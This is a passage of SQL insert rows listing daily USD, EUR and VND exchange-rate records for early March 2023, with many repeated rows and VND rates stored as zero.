(318, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-01'),
(319, 1, 'USD', 1.000000, 2, 'EUR', 0.941710, '2023-03-01'),
(320, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-01'),
(321, 2, 'EUR', 1.000000, 1, 'USD', 1.061900, '2023-03-01'),
(322, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-01'),
(323, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-01'),
(324, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-01'),
(325, 1, 'USD', 0.000000, 2, 'EUR', 0.941710, '2023-03-01'),
(326, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-01'),
(327, 2, 'EUR', 0.000000, 1, 'USD', 1.061900, '2023-03-01'),
(328, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-01'),
(329, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-01'),
(330, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-01'),
(331, 1, 'USD', 1.000000, 2, 'EUR', 0.941710, '2023-03-01'),
(332, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-01'),
(333, 2, 'EUR', 1.000000, 1, 'USD', 1.061900, '2023-03-01'),
(334, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-01'),
(335, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-01'),
(336, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-01'),
(337, 1, 'USD', 0.000000, 2, 'EUR', 0.941710, '2023-03-01'),
(338, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-01'),
(339, 2, 'EUR', 0.000000, 1, 'USD', 1.061900, '2023-03-01'),
(340, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-01'),
(341, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-01'),
(342, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-01'),
(343, 1, 'USD', 1.000000, 2, 'EUR', 0.941710, '2023-03-02'),
(344, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-02'),
(345, 2, 'EUR', 1.000000, 1, 'USD', 1.061900, '2023-03-02'),
(346, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-02'),
(347, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-02'),
(348, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-02'),
(349, 1, 'USD', 0.000000, 2, 'EUR', 0.935980, '2023-03-02'),
(350, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-02'),
(351, 2, 'EUR', 0.000000, 1, 'USD', 1.068400, '2023-03-02'),
(352, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-02'),
(353, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-02'),
(354, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-02'),
(355, 1, 'USD', 1.000000, 2, 'EUR', 0.935980, '2023-03-02'),
(356, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-02'),
(357, 2, 'EUR', 1.000000, 1, 'USD', 1.068400, '2023-03-02'),
(358, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-02'),
(359, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-02'),
(360, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-02'),
(361, 1, 'USD', 0.000000, 2, 'EUR', 0.935980, '2023-03-02'),
(362, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-02'),
(363, 2, 'EUR', 0.000000, 1, 'USD', 1.068400, '2023-03-02'),
(364, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-02'),
(365, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-02'),
(366, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-02'),
(367, 1, 'USD', 1.000000, 2, 'EUR', 0.935980, '2023-03-02'),
(368, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-02'),
(369, 2, 'EUR', 1.000000, 1, 'USD', 1.068400, '2023-03-02'),
(370, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-02'),
(371, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-02'),
(372, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-02'),
(373, 1, 'USD', 0.000000, 2, 'EUR', 0.935980, '2023-03-02'),
(374, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-02'),
(375, 2, 'EUR', 0.000000, 1, 'USD', 1.068400, '2023-03-02'),
(376, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-02'),
(377, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-02'),
(378, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-02'),
(379, 1, 'USD', 1.000000, 2, 'EUR', 0.935980, '2023-03-02'),
(380, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-02'),
(381, 2, 'EUR', 1.000000, 1, 'USD', 1.068400, '2023-03-02'),
(382, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-02'),
(383, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-02'),
(384, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-02'),
(385, 1, 'USD', 0.000000, 2, 'EUR', 0.935980, '2023-03-02'),
(386, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-02'),
(387, 2, 'EUR', 0.000000, 1, 'USD', 1.068400, '2023-03-02'),
(388, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-02'),
(389, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-02'),
(390, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-02'),
(391, 1, 'USD', 1.000000, 2, 'EUR', 0.935980, '2023-03-03'),
(392, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-03'),
(393, 2, 'EUR', 1.000000, 1, 'USD', 1.068400, '2023-03-03'),
(394, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-03'),
(395, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-03'),
(396, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-03'),
(397, 1, 'USD', 0.000000, 2, 'EUR', 0.942950, '2023-03-03'),
(398, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-03'),
(399, 2, 'EUR', 0.000000, 1, 'USD', 1.060500, '2023-03-03'),
(400, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-03'),
(401, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-03'),
(402, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-03'),
(403, 1, 'USD', 1.000000, 2, 'EUR', 0.942950, '2023-03-03'),
(404, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-03'),
(405, 2, 'EUR', 1.000000, 1, 'USD', 1.060500, '2023-03-03'),
(406, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-03'),
(407, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-03'),
(408, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-03'),
(409, 1, 'USD', 0.000000, 2, 'EUR', 0.942950, '2023-03-03'),
(410, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-03'),
(411, 2, 'EUR', 0.000000, 1, 'USD', 1.060500, '2023-03-03'),
(412, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-03'),
(413, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-03'),
(414, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-03'),
(415, 1, 'USD', 1.000000, 2, 'EUR', 0.942950, '2023-03-03'),
(416, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-03'),
(417, 2, 'EUR', 1.000000, 1, 'USD', 1.060500, '2023-03-03'),
(418, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-03'),
(419, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-03'),
(420, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-03'),
(421, 1, 'USD', 0.000000, 2, 'EUR', 0.942950, '2023-03-03'),
(422, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-03'),
(423, 2, 'EUR', 0.000000, 1, 'USD', 1.060500, '2023-03-03'),
(424, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-03'),
(425, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-03'),
(426, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-03'),
(427, 1, 'USD', 1.000000, 2, 'EUR', 0.942950, '2023-03-03'),
(428, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-03'),
(429, 2, 'EUR', 1.000000, 1, 'USD', 1.060500, '2023-03-03'),
(430, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-03'),
(431, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-03'),
(432, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-03'),
(433, 1, 'USD', 0.000000, 2, 'EUR', 0.942950, '2023-03-03'),
(434, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-03'),
(435, 2, 'EUR', 0.000000, 1, 'USD', 1.060500, '2023-03-03'),
(436, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-03'),
(437, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-03'),
(438, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-03'),
(439, 1, 'USD', 1.000000, 2, 'EUR', 0.942950, '2023-03-04'),
(440, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-04'),
(441, 2, 'EUR', 1.000000, 1, 'USD', 1.060500, '2023-03-04'),
(442, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-04'),
(443, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-04'),
(444, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-04'),
(445, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-04'),
(446, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-04'),
(447, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-04'),
(448, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-04'),
(449, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-04'),
(450, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-04'),
(451, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-04'),
(452, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-04'),
(453, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-04'),
(454, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-04'),
(455, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-04'),
(456, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-04'),
(457, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-04'),
(458, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-04'),
(459, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-04'),
(460, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-04'),
(461, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-04'),
(462, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-04'),
(463, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-04'),
(464, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-04'),
(465, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-04'),
(466, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-04'),
(467, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-04'),
(468, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-04'),
(469, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-04'),
(470, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-04'),
(471, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-04'),
(472, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-04'),
(473, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-04'),
(474, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-04'),
(475, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-04'),
(476, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-04'),
(477, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-04'),
(478, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-04'),
(479, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-04'),
(480, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-04'),
(481, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-04'),
(482, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-04'),
(483, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-04'),
(484, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-04'),
(485, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-04'),
(486, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-04'),
(487, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-05'),
(488, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-05'),
(489, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-05'),
(490, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-05'),
(491, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-05'),
(492, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-05'),
(493, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-05'),
(494, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-05'),
(495, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-05'),
(496, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-05'),
(497, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-05'),
(498, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-05'),
(499, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-05'),
(500, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-05'),
(501, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-05'),
(502, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-05'),
(503, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-05'),
(504, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-05'),
(505, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-05'),
(506, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-05'),
(507, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-05'),
(508, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-05'),
(509, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-05'),
(510, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-05'),
(511, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-05'),
(512, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-05'),
(513, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-05'),
(514, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-05'),
(515, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-05'),
(516, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-05'),
(517, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-05'),
(518, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-05'),
(519, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-05'),
(520, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-05'),
(521, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-05'),
(522, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-05'),
(523, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-05'),
(524, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-05'),
(525, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-05'),
(526, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-05'),
(527, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-05'),
(528, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-05'),
(529, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-05'),
(530, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-05'),
(531, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-05'),
(532, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-05'),
(533, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-05'),
(534, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-05'),
(535, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-06'),
(536, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-06'),
(537, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-06'),
(538, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-06'),
(539, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-06'),
(540, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-06'),
(541, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-06'),
(542, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-06'),
(543, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-06'),
(544, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-06'),
(545, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-06'),
(546, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-06'),
(547, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-06'),
(548, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-06'),
(549, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-06'),
(550, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-06'),
(551, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-06'),
(552, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-06'),
(553, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-06'),
(554, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-06'),
(555, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-06'),
(556, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-06'),
(557, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-06'),
(558, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-06'),
(559, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-06'),
(560, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-06'),
(561, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-06'),
(562, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-06'),
(563, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-06'),
(564, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-06'),
(565, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-06'),
(566, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-06'),
(567, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-06'),
(568, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-06'),
(569, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-06'),
(570, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-06'),
(571, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-06'),
(572, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-06'),
(573, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-06'),
(574, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-06'),
(575, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-06'),
(576, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-06'),
(577, 1, 'USD', 0.000000, 2, 'EUR', 0.942060, '2023-03-06'),
(578, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-06'),
(579, 2, 'EUR', 0.000000, 1, 'USD', 1.061500, '2023-03-06'),
(580, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-06'),
(581, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-06'),
(582, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-06'),
(583, 1, 'USD', 1.000000, 2, 'EUR', 0.942060, '2023-03-07'),
(584, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-07'),
(585, 2, 'EUR', 1.000000, 1, 'USD', 1.061500, '2023-03-07'),
(586, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-07'),
(587, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-07'),
(588, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-07'),
(589, 1, 'USD', 0.000000, 2, 'EUR', 0.939320, '2023-03-07'),
(590, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-07'),
(591, 2, 'EUR', 0.000000, 1, 'USD', 1.064600, '2023-03-07'),
(592, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-07'),
(593, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-07'),
(594, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-07'),
(595, 1, 'USD', 1.000000, 2, 'EUR', 0.939320, '2023-03-07'),
(596, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-07'),
(597, 2, 'EUR', 1.000000, 1, 'USD', 1.064600, '2023-03-07'),
(598, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-07'),
(599, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-07'),
(600, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-07'),
(601, 1, 'USD', 0.000000, 2, 'EUR', 0.939320, '2023-03-07'),
(602, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-07'),
(603, 2, 'EUR', 0.000000, 1, 'USD', 1.064600, '2023-03-07'),
(604, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-07'),
(605, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-07'),
(606, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-07'),
(607, 1, 'USD', 1.000000, 2, 'EUR', 0.939320, '2023-03-07'),
(608, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-07'),
(609, 2, 'EUR', 1.000000, 1, 'USD', 1.064600, '2023-03-07'),
(610, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-07'),
(611, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-07'),
(612, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-07'),
(613, 1, 'USD', 0.000000, 2, 'EUR', 0.939320, '2023-03-07'),
(614, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-07'),
(615, 2, 'EUR', 0.000000, 1, 'USD', 1.064600, '2023-03-07'),
(616, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-07'),
(617, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-07'),
(618, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-07'),
(619, 1, 'USD', 1.000000, 2, 'EUR', 0.939320, '2023-03-07'),
(620, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-07'),
(621, 2, 'EUR', 1.000000, 1, 'USD', 1.064600, '2023-03-07'),
(622, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-07'),
(623, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-07'),
(624, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-07'),
(625, 1, 'USD', 0.000000, 2, 'EUR', 0.939320, '2023-03-07'),
(626, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-07'),
(627, 2, 'EUR', 0.000000, 1, 'USD', 1.064600, '2023-03-07'),
(628, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-07'),
(629, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-07'),
(630, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-07'),
(631, 1, 'USD', 1.000000, 2, 'EUR', 0.939320, '2023-03-08'),
(632, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-08'),
(633, 2, 'EUR', 1.000000, 1, 'USD', 1.064600, '2023-03-08'),
(634, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-08'),
(635, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-08'),
(636, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-08'),
(637, 1, 'USD', 0.000000, 2, 'EUR', 0.937650, '2023-03-08'),
(638, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-08'),
(639, 2, 'EUR', 0.000000, 1, 'USD', 1.066500, '2023-03-08'),
(640, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-08'),
(641, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-08'),
(642, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-08'),
(643, 1, 'USD', 1.000000, 2, 'EUR', 0.937650, '2023-03-08'),
(644, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-08'),
(645, 2, 'EUR', 1.000000, 1, 'USD', 1.066500, '2023-03-08'),
(646, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-08'),
(647, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-08'),
(648, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-08'),
(649, 1, 'USD', 0.000000, 2, 'EUR', 0.937650, '2023-03-08'),
(650, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-08'),
(651, 2, 'EUR', 0.000000, 1, 'USD', 1.066500, '2023-03-08'),
(652, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-08'),
(653, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-08'),
(654, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-08'),
(655, 1, 'USD', 1.000000, 2, 'EUR', 0.937650, '2023-03-08'),
(656, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-08'),
(657, 2, 'EUR', 1.000000, 1, 'USD', 1.066500, '2023-03-08'),
(658, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-08'),
(659, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-08'),
(660, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-08'),
(661, 1, 'USD', 0.000000, 2, 'EUR', 0.937650, '2023-03-08'),
(662, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-08'),
(663, 2, 'EUR', 0.000000, 1, 'USD', 1.066500, '2023-03-08'),
(664, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-08'),
(665, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-08'),
(666, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-08'),
(667, 1, 'USD', 1.000000, 2, 'EUR', 0.937650, '2023-03-08'),
(668, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-08'),
(669, 2, 'EUR', 1.000000, 1, 'USD', 1.066500, '2023-03-08'),
(670, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-08'),
(671, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-08'),
(672, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-08'),
(673, 1, 'USD', 0.000000, 2, 'EUR', 0.937650, '2023-03-08'),
(674, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-08'),
(675, 2, 'EUR', 0.000000, 1, 'USD', 1.066500, '2023-03-08'),
(676, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-08'),
(677, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-08'),
